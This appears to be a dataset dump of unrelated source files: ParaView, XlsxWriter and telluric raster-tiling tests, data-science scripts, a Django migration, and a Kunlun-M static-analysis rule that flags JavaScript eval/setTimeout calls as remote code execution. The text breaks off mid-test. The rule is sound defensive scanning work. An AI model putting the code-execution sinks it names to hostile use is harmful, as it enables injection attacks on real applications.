xj361685640/ParaView
|
0a27eef5abc5a0c0472ab0bc806c4db881156e64
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 815
|
2015-01-03T02:14:04.000Z
|
2022-03-26T07:48:07.000Z
|
Clients/ParaView/Testing/Python/AppendAttributes.py
|
xj361685640/ParaView
|
0a27eef5abc5a0c0472ab0bc806c4db881156e64
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 9
|
2015-04-28T20:10:37.000Z
|
2021-08-20T18:19:01.000Z
|
Clients/ParaView/Testing/Python/AppendAttributes.py
|
xj361685640/ParaView
|
0a27eef5abc5a0c0472ab0bc806c4db881156e64
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 328
|
2015-01-22T23:11:46.000Z
|
2022-03-14T06:07:52.000Z
|
#/usr/bin/env python
from paraview.simple import *
import sys
wavelet1 = Wavelet()
wavelet2 = Wavelet()
pythonCalculator1 = PythonCalculator(Input=wavelet2)
pythonCalculator1.ArrayName = 'RTData'
pythonCalculator1.Expression = 'RTData+200'
pythonCalculator1.CopyArrays = 0
# this one should be ignored in the output since it has a different
# amount of points and cells than the first one
sphereSource = Sphere()
appendAttributes1 = AppendAttributes(Input=[wavelet1, sphereSource, pythonCalculator1])
appendAttributes1.UpdatePipeline()
if appendAttributes1.PointData.GetNumberOfArrays() != 2:
# should have RTData and RTData_input_1
print("ERROR: wrong number of arrays ", appendAttributes1.PointData.GetNumberOfArrays())
sys.exit(1)
arrayRange = appendAttributes1.PointData['RTData'].GetRange()
if arrayRange[0] < 37 or arrayRange[0] > 38 or arrayRange[1] < 276 or arrayRange[0] > 277:
print("ERROR: RTData has wrong array range ", arrayRange)
sys.exit(1)
arrayRange = appendAttributes1.PointData['RTData_input_2'].GetRange()
if arrayRange[0] < 237 or arrayRange[0] > 238 or arrayRange[1] < 476 or arrayRange[0] > 477:
print("ERROR: RTData_input_2 has wrong array range ", arrayRange)
sys.exit(1)
# now try with the can.ex2 exodus file for multiblock testing
for i, arg in enumerate(sys.argv):
if arg == "-D" and i+1 < len(sys.argv):
dataFile = sys.argv[i+1] + '/Testing/Data/can.ex2'
canex2 = ExodusIIReader(FileName=[dataFile])
canex2.ElementVariables = ['EQPS']
canex2.PointVariables = ['DISPL', 'VEL', 'ACCL']
canex2.GlobalVariables = ['KE', 'XMOM', 'YMOM', 'ZMOM', 'NSTEPS', 'TMSTEP']
calculator1 = Calculator(Input=canex2)
calculator1.AttributeType = 'Point Data'
calculator1.CoordinateResults = 0
calculator1.ResultNormals = 0
calculator1.ResultTCoords = 0
calculator1.ReplaceInvalidResults = 1
calculator1.ReplacementValue = 0.0
calculator1.ResultArrayName = 'VEL_X'
calculator1.Function = 'VEL_X+100'
appendAttributes2 = AppendAttributes(Input=[canex2, calculator1])
appendAttributes2.UpdatePipeline()
print("success")
| 35.862069
| 92
| 0.755288
|
from paraview.simple import *
import sys
wavelet1 = Wavelet()
wavelet2 = Wavelet()
pythonCalculator1 = PythonCalculator(Input=wavelet2)
pythonCalculator1.ArrayName = 'RTData'
pythonCalculator1.Expression = 'RTData+200'
pythonCalculator1.CopyArrays = 0
sphereSource = Sphere()
appendAttributes1 = AppendAttributes(Input=[wavelet1, sphereSource, pythonCalculator1])
appendAttributes1.UpdatePipeline()
if appendAttributes1.PointData.GetNumberOfArrays() != 2:
print("ERROR: wrong number of arrays ", appendAttributes1.PointData.GetNumberOfArrays())
sys.exit(1)
arrayRange = appendAttributes1.PointData['RTData'].GetRange()
if arrayRange[0] < 37 or arrayRange[0] > 38 or arrayRange[1] < 276 or arrayRange[0] > 277:
print("ERROR: RTData has wrong array range ", arrayRange)
sys.exit(1)
arrayRange = appendAttributes1.PointData['RTData_input_2'].GetRange()
if arrayRange[0] < 237 or arrayRange[0] > 238 or arrayRange[1] < 476 or arrayRange[0] > 477:
print("ERROR: RTData_input_2 has wrong array range ", arrayRange)
sys.exit(1)
for i, arg in enumerate(sys.argv):
if arg == "-D" and i+1 < len(sys.argv):
dataFile = sys.argv[i+1] + '/Testing/Data/can.ex2'
canex2 = ExodusIIReader(FileName=[dataFile])
canex2.ElementVariables = ['EQPS']
canex2.PointVariables = ['DISPL', 'VEL', 'ACCL']
canex2.GlobalVariables = ['KE', 'XMOM', 'YMOM', 'ZMOM', 'NSTEPS', 'TMSTEP']
calculator1 = Calculator(Input=canex2)
calculator1.AttributeType = 'Point Data'
calculator1.CoordinateResults = 0
calculator1.ResultNormals = 0
calculator1.ResultTCoords = 0
calculator1.ReplaceInvalidResults = 1
calculator1.ReplacementValue = 0.0
calculator1.ResultArrayName = 'VEL_X'
calculator1.Function = 'VEL_X+100'
appendAttributes2 = AppendAttributes(Input=[canex2, calculator1])
appendAttributes2.UpdatePipeline()
print("success")
| true
| true
|
790dbb66da0d930c4aacd463d876583994ead967
| 182
|
py
|
Python
|
python_ex/01ex.py
|
llinmeng/PythonStudy
|
68c27eaa302b95aa4fb35d794f0d645f98b832dd
|
[
"MIT"
] | null | null | null |
python_ex/01ex.py
|
llinmeng/PythonStudy
|
68c27eaa302b95aa4fb35d794f0d645f98b832dd
|
[
"MIT"
] | null | null | null |
python_ex/01ex.py
|
llinmeng/PythonStudy
|
68c27eaa302b95aa4fb35d794f0d645f98b832dd
|
[
"MIT"
] | null | null | null |
print "Hello World!"
print "Hello Again"
print "I like typing this."
print "This is fun."
print "Yay! Printing"
print "Id much rather you 'not'."
print 'I "said" do not touch this.'
| 22.75
| 35
| 0.697802
|
print "Hello World!"
print "Hello Again"
print "I like typing this."
print "This is fun."
print "Yay! Printing"
print "Id much rather you 'not'."
print 'I "said" do not touch this.'
| false
| true
|
790dbc3fe1067ad92b9c1bc56af87986404f11fa
| 202
|
py
|
Python
|
services/resource/project/utils/enums.py
|
spruce-cq/sblog
|
287571bffcf19c224d3b4ad4e4e9347225245350
|
[
"MIT"
] | null | null | null |
services/resource/project/utils/enums.py
|
spruce-cq/sblog
|
287571bffcf19c224d3b4ad4e4e9347225245350
|
[
"MIT"
] | 7
|
2020-09-07T15:06:12.000Z
|
2022-02-26T19:09:01.000Z
|
services/resource/project/utils/enums.py
|
spruce-cq/sblog
|
287571bffcf19c224d3b4ad4e4e9347225245350
|
[
"MIT"
] | null | null | null |
# services/resource/project/utils/enums.py
from enum import Enum
class Status(Enum):
normal = 0
delete = 1
other = 2
class Scope(Enum):
user = 'UserScope'
admin = 'AdminScope'
| 12.625
| 42
| 0.643564
|
from enum import Enum
class Status(Enum):
normal = 0
delete = 1
other = 2
class Scope(Enum):
user = 'UserScope'
admin = 'AdminScope'
| true
| true
|
790dbc43e17a08ab4288c2517635a930ec91e743
| 1,594
|
py
|
Python
|
quora/pyfm/generate_interaction.py
|
zonemercy/Kaggle
|
35ecb08272b6491f5e6756c97c7dec9c46a13a43
|
[
"MIT"
] | 17
|
2017-10-01T00:10:19.000Z
|
2022-02-07T12:11:01.000Z
|
quora/pyfm/generate_interaction.py
|
zonemercy/Kaggle
|
35ecb08272b6491f5e6756c97c7dec9c46a13a43
|
[
"MIT"
] | null | null | null |
quora/pyfm/generate_interaction.py
|
zonemercy/Kaggle
|
35ecb08272b6491f5e6756c97c7dec9c46a13a43
|
[
"MIT"
] | 1
|
2019-08-15T03:58:51.000Z
|
2019-08-15T03:58:51.000Z
|
import os
import numpy as np
import pandas as pd
from sklearn.preprocessing import OneHotEncoder,LabelEncoder,StandardScaler
from sklearn.decomposition import TruncatedSVD,PCA
from sklearn.metrics.pairwise import cosine_similarity,pairwise_distances
from sklearn.feature_extraction.text import TfidfVectorizer
SEED = 2048
np.random.seed(SEED)
PATH = os.path.expanduser("~") + "/data/quora/"
train = pd.read_csv(PATH + "train_porter.csv")#, nrows=5000)
test = pd.read_csv(PATH + "test_porter.csv")#, nrows=5000)
test['is_duplicated'] = [-1]*test.shape[0]
len_train = train.shape[0]
data_all = pd.concat([train,test])
def calc_set_intersection(obj,target):
a = set(obj.split())
b = set(target.split())
return (len(a.intersection(b))*1.0) / (len(a)*1.0)
print('Generate intersection')
train_interaction = train.astype(str).apply(lambda x: calc_set_intersection(x['question1'],x['question2']),axis=1)
test_interaction = test.astype(str).apply(lambda x: calc_set_intersection(x['question1'],x['question2']),axis=1)
pd.to_pickle(train_interaction,PATH+"train_interaction.pkl")
pd.to_pickle(test_interaction,PATH+"test_interaction.pkl")
print('Generate porter intersection')
train_porter_interaction = train.astype(str).apply(lambda x:calc_set_intersection(x['question1_porter'],x['question2_porter']),axis=1)
test_porter_interaction = test.astype(str).apply(lambda x:calc_set_intersection(x['question1_porter'],x['question2_porter']),axis=1)
pd.to_pickle(train_porter_interaction, PATH+"train_porter_interaction.pkl")
pd.to_pickle(test_porter_interaction, PATH+"test_porter_interaction.pkl")
| 45.542857
| 134
| 0.788582
|
import os
import numpy as np
import pandas as pd
from sklearn.preprocessing import OneHotEncoder,LabelEncoder,StandardScaler
from sklearn.decomposition import TruncatedSVD,PCA
from sklearn.metrics.pairwise import cosine_similarity,pairwise_distances
from sklearn.feature_extraction.text import TfidfVectorizer
SEED = 2048
np.random.seed(SEED)
PATH = os.path.expanduser("~") + "/data/quora/"
train = pd.read_csv(PATH + "train_porter.csv")
test = pd.read_csv(PATH + "test_porter.csv")
test['is_duplicated'] = [-1]*test.shape[0]
len_train = train.shape[0]
data_all = pd.concat([train,test])
def calc_set_intersection(obj,target):
a = set(obj.split())
b = set(target.split())
return (len(a.intersection(b))*1.0) / (len(a)*1.0)
print('Generate intersection')
train_interaction = train.astype(str).apply(lambda x: calc_set_intersection(x['question1'],x['question2']),axis=1)
test_interaction = test.astype(str).apply(lambda x: calc_set_intersection(x['question1'],x['question2']),axis=1)
pd.to_pickle(train_interaction,PATH+"train_interaction.pkl")
pd.to_pickle(test_interaction,PATH+"test_interaction.pkl")
print('Generate porter intersection')
train_porter_interaction = train.astype(str).apply(lambda x:calc_set_intersection(x['question1_porter'],x['question2_porter']),axis=1)
test_porter_interaction = test.astype(str).apply(lambda x:calc_set_intersection(x['question1_porter'],x['question2_porter']),axis=1)
pd.to_pickle(train_porter_interaction, PATH+"train_porter_interaction.pkl")
pd.to_pickle(test_porter_interaction, PATH+"test_porter_interaction.pkl")
| true
| true
|
790dbd0078150244cae8de4b721c0c6c27361515
| 779
|
py
|
Python
|
src/classification/predict_with_umap.py
|
menchelab/UMAPanalysis
|
09f9b4a7823f6eceb6b40e25ee21412f3bf1c7fe
|
[
"MIT"
] | 2
|
2022-02-27T19:19:36.000Z
|
2022-03-15T10:38:36.000Z
|
src/classification/predict_with_umap.py
|
menchelab/UMAPanalysis
|
09f9b4a7823f6eceb6b40e25ee21412f3bf1c7fe
|
[
"MIT"
] | null | null | null |
src/classification/predict_with_umap.py
|
menchelab/UMAPanalysis
|
09f9b4a7823f6eceb6b40e25ee21412f3bf1c7fe
|
[
"MIT"
] | null | null | null |
import sys
import re
import pandas as pd
network_filename = sys.argv[1]
m = re.match("networks/(?P<dataset>.*?)_similarity", network_filename)
dataset = m.groupdict()['dataset']
G=nx.read_gml(network_filename)
labels=pd.read_csv(f"munged_data/{dataset}/labels.csv", index_col=0)
metadata = pd.read_csv(f"data/intermediate/{dataset}/metadata.csv", index_col=0)
features = pd.read_csv(f"data/intermediate/{dataset}/features.csv", index_col=0)
train = pd.read_csv(f"data/intermediate/{dataset}/train.csv", header = None)[0].values
testing = pd.Series({i:(i in test) for i in labels.index})
labels = labels.mask(testing, other=0)
propagator,nodes=make_propagator(G)
df,df_time=propagate(propagator, nodes, moas)
df.to_csv(f"predictions/{dataset}/predicted_by_propagation.csv")
| 33.869565
| 86
| 0.762516
|
import sys
import re
import pandas as pd
network_filename = sys.argv[1]
m = re.match("networks/(?P<dataset>.*?)_similarity", network_filename)
dataset = m.groupdict()['dataset']
G=nx.read_gml(network_filename)
labels=pd.read_csv(f"munged_data/{dataset}/labels.csv", index_col=0)
metadata = pd.read_csv(f"data/intermediate/{dataset}/metadata.csv", index_col=0)
features = pd.read_csv(f"data/intermediate/{dataset}/features.csv", index_col=0)
train = pd.read_csv(f"data/intermediate/{dataset}/train.csv", header = None)[0].values
testing = pd.Series({i:(i in test) for i in labels.index})
labels = labels.mask(testing, other=0)
propagator,nodes=make_propagator(G)
df,df_time=propagate(propagator, nodes, moas)
df.to_csv(f"predictions/{dataset}/predicted_by_propagation.csv")
| true
| true
|
790dbdcf0a9d7aaa327e40cf4253ecb288613544
| 596
|
py
|
Python
|
keyword_relation/migrations/0011_keyword_grouping.py
|
rohanjsuresh/extracted_keyword_validation
|
94e56c645c066d9d20097433b1716b3e76625b3d
|
[
"MIT"
] | null | null | null |
keyword_relation/migrations/0011_keyword_grouping.py
|
rohanjsuresh/extracted_keyword_validation
|
94e56c645c066d9d20097433b1716b3e76625b3d
|
[
"MIT"
] | null | null | null |
keyword_relation/migrations/0011_keyword_grouping.py
|
rohanjsuresh/extracted_keyword_validation
|
94e56c645c066d9d20097433b1716b3e76625b3d
|
[
"MIT"
] | 1
|
2021-05-18T16:40:55.000Z
|
2021-05-18T16:40:55.000Z
|
# Generated by Django 3.0.8 on 2021-07-07 22:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('keyword_relation', '0010_auto_20210322_2049'),
]
operations = [
migrations.CreateModel(
name='Keyword_Grouping',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('keyword', models.CharField(max_length=512)),
('group', models.IntegerField(default=-1)),
],
),
]
| 27.090909
| 114
| 0.588926
|
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('keyword_relation', '0010_auto_20210322_2049'),
]
operations = [
migrations.CreateModel(
name='Keyword_Grouping',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('keyword', models.CharField(max_length=512)),
('group', models.IntegerField(default=-1)),
],
),
]
| true
| true
|
790dbe9c2575b584fcde93e4a4489e80e4e28895
| 1,455
|
py
|
Python
|
xlsxwriter/test/comparison/test_chart_scatter03.py
|
Rippling/XlsxWriter-1
|
be8d1cb8f8b156cf87bbe5d591f1f5475804be44
|
[
"BSD-2-Clause"
] | null | null | null |
xlsxwriter/test/comparison/test_chart_scatter03.py
|
Rippling/XlsxWriter-1
|
be8d1cb8f8b156cf87bbe5d591f1f5475804be44
|
[
"BSD-2-Clause"
] | null | null | null |
xlsxwriter/test/comparison/test_chart_scatter03.py
|
Rippling/XlsxWriter-1
|
be8d1cb8f8b156cf87bbe5d591f1f5475804be44
|
[
"BSD-2-Clause"
] | null | null | null |
###############################################################################
#
# Tests for XlsxWriter.
#
# SPDX-License-Identifier: BSD-2-Clause
# Copyright (c), 2013-2021, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparison_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.set_filename('chart_scatter03.xlsx')
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
chart = workbook.add_chart({'type': 'scatter', 'subtype': 'straight'})
chart.axis_ids = [54010624, 45705856]
data = [
[1, 2, 3, 4, 5],
[2, 4, 6, 8, 10],
[3, 6, 9, 12, 15],
]
worksheet.write_column('A1', data[0])
worksheet.write_column('B1', data[1])
worksheet.write_column('C1', data[2])
chart.add_series({'categories': '=Sheet1!$A$1:$A$5',
'values': '=Sheet1!$B$1:$B$5'})
chart.add_series({'categories': '=Sheet1!$A$1:$A$5',
'values': '=Sheet1!$C$1:$C$5',
})
worksheet.insert_chart('E9', chart)
workbook.close()
self.assertExcelEqual()
| 26.454545
| 79
| 0.538832
| true
| true
|
|
790dbf8c0033ff8b410ae68d704d1f7f043f9f53
| 1,090
|
py
|
Python
|
rules/javascript/CVI_3003.py
|
dahua966/Kunlun-M
|
978dd0650b555a677d2c5d74fc86ff66319a2d57
|
[
"MIT"
] | 1
|
2021-06-25T01:44:45.000Z
|
2021-06-25T01:44:45.000Z
|
rules/javascript/CVI_3003.py
|
dahua966/Kunlun-M
|
978dd0650b555a677d2c5d74fc86ff66319a2d57
|
[
"MIT"
] | null | null | null |
rules/javascript/CVI_3003.py
|
dahua966/Kunlun-M
|
978dd0650b555a677d2c5d74fc86ff66319a2d57
|
[
"MIT"
] | 2
|
2020-12-09T08:26:45.000Z
|
2021-04-12T03:24:34.000Z
|
# -*- coding: utf-8 -*-
"""
auto rule template
~~~~
:author: LoRexxar <LoRexxar@gmail.com>
:homepage: https://github.com/LoRexxar/Kunlun-M
:license: MIT, see LICENSE for more details.
:copyright: Copyright (c) 2017 LoRexxar. All rights reserved
"""
from utils.api import *
class CVI_3003():
"""
rule class
"""
def __init__(self):
self.svid = 3003
self.language = "javascript"
self.author = "LoRexxar"
self.vulnerability = "RCE"
self.description = "remote? code exec"
# status
self.status = True
# 部分配置
self.match_mode = "function-param-regex"
self.match = r"eval|setTimeout"
# for solidity
self.match_name = None
self.black_list = None
# for chrome ext
self.keyword = None
# for regex
self.unmatch = None
self.vul_function = None
def main(self, regex_string):
"""
regex string input
:regex_string: regex match string
:return:
"""
pass
| 20.185185
| 64
| 0.555046
|
from utils.api import *
class CVI_3003():
def __init__(self):
self.svid = 3003
self.language = "javascript"
self.author = "LoRexxar"
self.vulnerability = "RCE"
self.description = "remote? code exec"
self.status = True
self.match_mode = "function-param-regex"
self.match = r"eval|setTimeout"
self.match_name = None
self.black_list = None
self.keyword = None
self.unmatch = None
self.vul_function = None
def main(self, regex_string):
pass
| true
| true
|
790dc041534631695a4a573017e279551b20bf64
| 24,594
|
py
|
Python
|
tests/test_georaster_tiling.py
|
SimoneDeGasperis/telluric
|
2fe4388f4a69a5a939078a876943c5f4620693ca
|
[
"MIT"
] | 81
|
2018-04-12T12:29:06.000Z
|
2022-03-17T09:41:55.000Z
|
tests/test_georaster_tiling.py
|
SimoneDeGasperis/telluric
|
2fe4388f4a69a5a939078a876943c5f4620693ca
|
[
"MIT"
] | 283
|
2018-04-09T11:32:25.000Z
|
2022-03-25T22:16:38.000Z
|
tests/test_georaster_tiling.py
|
SimoneDeGasperis/telluric
|
2fe4388f4a69a5a939078a876943c5f4620693ca
|
[
"MIT"
] | 22
|
2018-04-09T10:53:52.000Z
|
2022-02-09T10:38:33.000Z
|
import os
import rasterio
import mercantile
import numpy as np
import pytest
from tempfile import NamedTemporaryFile, TemporaryDirectory
from affine import Affine
from unittest import TestCase
from unittest.mock import patch
from datetime import datetime
from shapely.geometry import Polygon
from rasterio.enums import Resampling
from rasterio.windows import Window
from rasterio.crs import CRS
from telluric import GeoRaster2, GeoVector
from telluric.constants import WEB_MERCATOR_CRS, WGS84_CRS
from telluric.georaster import MERCATOR_RESOLUTION_MAPPING, GeoRaster2Error, GeoRaster2IOError
from telluric.util.general import convert_resolution_from_meters_to_deg
import sys
import logging
import tempfile
log = logging.getLogger('rasterio._gdal')
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(message)s')
ch.setFormatter(formatter)
log.addHandler(ch)
manualtest = pytest.mark.skipif("TEST_MANUAL" not in os.environ, reason="skip on auto testing")
window_data = pytest.mark.skip('pending decission of consistency in results between rasterio read and reproject')
framing = pytest.mark.skip('witing for framing and get_window with boundless false')
tiles = {
10: (579, 394, 10),
11: (1159, 789, 11),
12: (2319, 1578, 12),
14: (9277, 6312, 14),
15: (18554, 12624, 15),
17: (74216, 50496, 17),
18: (148433, 100994, 18)
}
class GeoRaster2TilesTestGeneral(TestCase):
"""GeoRaster2 Tiles general tests."""
def test_raise_exception_on_bad_file_path(self):
vr = GeoRaster2.open('stam')
with self.assertRaises(GeoRaster2IOError):
vr.get_tile(1, 2, 3)
def test_raise_exception_on_bad_raster_url(self):
vr = GeoRaster2.open('http://stam')
with self.assertRaises(GeoRaster2IOError):
vr.get_tile(1, 2, 3)
def test_raise_exception_on_bad_file_path_save_cog(self):
vr = GeoRaster2.open('stam')
with self.assertRaises(GeoRaster2IOError):
vr.save_cloud_optimized('dest_file')
def test_raise_exception_on_bad_raster_url_save_cog(self):
vr = GeoRaster2.open('http://stam')
with self.assertRaises(GeoRaster2IOError):
vr.save_cloud_optimized('dest_file')
class BaseGeoRasterTestCase(TestCase):
@classmethod
def setUpClass(cls):
path = "./tests/data/raster/raster_for_test.tif"
cls.read_only_vgr = GeoRaster2.open(path)
path = "./tests/data/raster/raster_wgs84.tif"
cls.read_only_vgr_wgs84 = GeoRaster2.open(path)
def read_only_virtual_geo_raster(self):
return self.read_only_vgr
def read_only_virtual_geo_raster_wgs84(self):
return self.read_only_vgr_wgs84
class GeoRaster2TestGetTile(BaseGeoRasterTestCase):
"""GeoRaster2 get tile tests."""
def test_geo_bounding_tile(self):
gr = self.read_only_virtual_geo_raster()
gv = gr.footprint().reproject(WGS84_CRS)
bounding_tile = mercantile.bounding_tile(*gv.get_shape(gv.crs).bounds)
self.assertEqual(bounding_tile, (37108, 25248, 16))
@patch.object(GeoRaster2, 'crop')
def test_fails_with_empty_raster_for_tile_out_of_raster_area(self, mock__crop):
for raster in [self.read_only_virtual_geo_raster(), self.read_only_virtual_geo_raster_wgs84()]:
r = raster.get_tile(16384, 16383, 15)
self.assertTrue((r.image.data == 0).all())
self.assertTrue((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 256, 256))
self.assertEqual(r.crs, WEB_MERCATOR_CRS)
mock__crop.assert_not_called()
def test_get_all_raster_in_a_single_tile(self):
for raster in [self.read_only_virtual_geo_raster(), self.read_only_virtual_geo_raster_wgs84()]:
p = raster.footprint().reproject(WGS84_CRS).centroid
r = raster.get_tile(*mercantile.tile(lng=p.x, lat=p.y, zoom=11))
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 256, 256))
self.assertEqual(r.crs, WEB_MERCATOR_CRS)
def test_get_tile_for_different_zoom_levels(self):
for raster in [self.read_only_virtual_geo_raster(), self.read_only_virtual_geo_raster_wgs84()]:
for zoom in tiles:
r = raster.get_tile(*tiles[zoom])
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 256, 256))
def test_get_tile_from_different_crs_tile_is_not_tilted(self):
raster = self.read_only_virtual_geo_raster_wgs84()
r = raster.get_tile(*tiles[18])
self.assertEqual(1, len(np.unique(r.image.mask)))
def test_get_tile_from_different_crs_tile_is_not_tilted_with_different_buffer(self):
raster = self.read_only_virtual_geo_raster_wgs84()
os.environ["TELLURIC_GET_TILE_BUFFER"] = "0"
try:
r = raster.get_tile(*tiles[18])
except Exception:
del os.environ["TELLURIC_GET_TILE_BUFFER"]
self.assertEqual(2, len(np.unique(r.image.mask)))
def test_get_entire_all_raster(self):
vr = self.read_only_virtual_geo_raster()
roi = GeoVector.from_xyz(37108, 25248, 16)
r = vr.crop(roi)
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.shape, (3, 612, 612))
def test_fails_with_empty_raster_for_tile_out_of_raster_area_with_no_tile_size(self):
vr = self.read_only_virtual_geo_raster()
roi = GeoVector.from_xyz(16384, 16383, 15)
r = vr.crop(roi)
self.assertTrue((r.image.data == 0).all())
self.assertTrue((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 1223, 1223))
def test_get_window_of_full_resolution(self):
vr = self.read_only_virtual_geo_raster()
win = Window(0, 0, 300, 300)
r = vr.get_window(win)
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 300, 300))
def test_get_window_resize_to_256(self):
vr = self.read_only_virtual_geo_raster()
win = Window(0, 0, 300, 300)
r = vr.get_window(win, xsize=256, ysize=256)
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 256, 256))
def test_get_window_of_non_square_resize_to_256(self):
vr = self.read_only_virtual_geo_raster()
win = Window(0, 0, 300, 400)
r = vr.get_window(win, xsize=256, ysize=256)
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 256, 256))
def test_get_window_of_non_square_keeps_size_proportions_for_give_xsize(self):
vr = self.read_only_virtual_geo_raster()
win = Window(0, 0, 300, 400)
r = vr.get_window(win, xsize=150)
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 200, 150))
def test_get_window_of_non_square_keeps_size_proportions_for_give_ysize(self):
vr = self.read_only_virtual_geo_raster()
win = Window(0, 0, 300, 400)
r = vr.get_window(win, ysize=200)
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 200, 150))
def test_get_window_width_height_correctness(self):
# See https://publicgitlab.satellogic.com/telluric/telluric/issues/58
vr = self.read_only_virtual_geo_raster()
expected_height = 200
win = Window(0, vr.height - expected_height, 1, expected_height)
r = vr.get_window(win)
self.assertEqual(r.image.shape, (3, expected_height, 1))
class GeoRasterCropTest(BaseGeoRasterTestCase):
metric_affine = Affine(1, 0.0, 2653750, 0.0, -1, 4594461)
def test_crop_in_memory_and_off_memory_without_resizing_are_the_same(self):
coords = mercantile.xy_bounds(*tiles[18])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster2 = GeoRaster2.open(rf.name)
off_memory_crop = raster2.crop(shape)
# load the image data
raster2.image
in_memory_crop = raster2.crop(shape)
self.assertEqual(off_memory_crop, in_memory_crop)
@window_data
def test_crop_and_get_tile_do_the_same(self):
coords = mercantile.xy_bounds(*tiles[15])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster2 = GeoRaster2.open(rf.name)
tile15 = raster2.get_tile(*tiles[15])
# load the image data
raster2.image
cropped15 = raster2.crop(shape, MERCATOR_RESOLUTION_MAPPING[15])
self.assertEqual(tile15, cropped15)
@window_data
def test_crop_and_get_tile_do_the_same_when_image_is_populated(self):
coords = mercantile.xy_bounds(*tiles[15])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster = GeoRaster2.open(rf.name)
tile15 = raster.get_tile(*tiles[15])
raster._populate_from_rasterio_object(read_image=True)
cropped_15 = raster.crop(shape, MERCATOR_RESOLUTION_MAPPING[15])
self.assertEqual(tile15, cropped_15)
@window_data
def test_crop_image_from_and_get_win_do_the_same_with_resize(self):
bounds = (2, 3, 4, 5)
win = rasterio.windows.Window(bounds[0], bounds[1], bounds[2] - bounds[0], bounds[3] - bounds[1])
xsize = round((bounds[2] - bounds[0]) / 2)
ysize = round((bounds[3] - bounds[1]) / 2)
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster.save('area.tif', tags={'AREA_OR_POINT': 'Area'})
raster.save('point.tif', tags={'AREA_OR_POINT': 'Point'})
saved_raster = GeoRaster2.open(rf.name)
cropped_win = saved_raster.get_window(win, xsize=xsize, ysize=ysize)
saved_raster_area = GeoRaster2.open('area.tif')
cropped_win_area = saved_raster_area.get_window(win, xsize=xsize, ysize=ysize)
saved_raster_point = GeoRaster2.open('point.tif')
cropped_win_point = saved_raster_point.get_window(win, xsize=xsize, ysize=ysize)
cropped_image = raster._crop(bounds, xsize=xsize, ysize=ysize)
print('cropped_win_area pixels\n', cropped_win_area.image)
print('cropped_win_point pixels\n', cropped_win_point.image)
print('cropped_win pixels\n', cropped_win.image)
print('cropped_image pixels\n', cropped_image.image)
if (cropped_win_point == cropped_win_area):
print('point == area')
if (cropped_image == cropped_win_area):
print('image == area')
if (cropped_image == cropped_win_point):
print('image == point')
if (cropped_win == cropped_win_area):
print('win == area')
if (cropped_win == cropped_win_point):
print('win == point')
self.assertEqual(cropped_image, cropped_win)
@framing
def test_crop_and_get_tile_do_the_same_when_image_is_populated_first_high_zoom(self):
coords = mercantile.xy_bounds(*tiles[17])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster = GeoRaster2.open(rf.name)
raster._populate_from_rasterio_object(read_image=True)
tile17 = raster.get_tile(*tiles[17])
cropped_17 = raster.crop(shape, MERCATOR_RESOLUTION_MAPPING[17])
self.assertEqual(tile17, cropped_17)
@framing
def test_crop_and_get_tile_do_the_same_when_image_is_populated_first_mid_zoom(self):
coords = mercantile.xy_bounds(*tiles[15])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster = GeoRaster2.open(rf.name)
raster._populate_from_rasterio_object(read_image=True)
tile15 = raster.get_tile(*tiles[15])
cropped_15 = raster.crop(shape, MERCATOR_RESOLUTION_MAPPING[15])
self.assertEqual(tile15, cropped_15)
@framing
def test_crop_and_get_tile_do_the_same_when_image_is_populated_first_for_low_zoom(self):
coords = mercantile.xy_bounds(*tiles[11])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
